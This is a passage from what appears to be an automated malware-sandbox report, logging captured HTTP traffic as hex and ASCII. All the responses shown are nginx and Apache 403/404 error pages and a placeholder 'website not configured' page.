Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 18:53:08 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 10 Jan 2025 18:53:14 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->0
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 10 Jan 2025 18:53:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->0
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 10 Jan 2025 18:53:19 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 18:53:28 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66df0ead-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 18:53:30 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66df0ead-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 18:53:33 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66df0ead-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 18:53:36 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66df0ead-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 18:53:50 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closex-ray: p13015:0.000Data Raw: 31 34 61 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 37 30 30 26 73 75 62 73 65 74 3d 6c 61 74 69 6e 2c 63 79 72 69 6c 6c 69 63 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 09 3c 54 49 54 4c 45 3e 57 65 62 73 69 74 65 20 77 77 77 2e 6d 6f 6e 74 65 72 6f 2d 62 65 61 75 74 79 2e 6f 6e 6c 69 6e 65 20 6e 6f 74 20 63 6f 6e 66 69 67 75 72 65 64 3c 2f 54 49 54 4c 45 3e 0a 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4f 70 65 6e 20 53 61 6e 73 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 31 66 34 66 35 3b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 65 6e 74 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 76 68 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 76 68 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 67 61 70 3a 20 31 2e 35 65 6d 3b 0a 20 20 20 20 20 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 18:53:56 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 18:53:59 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 18:54:01 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 18:54:04 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 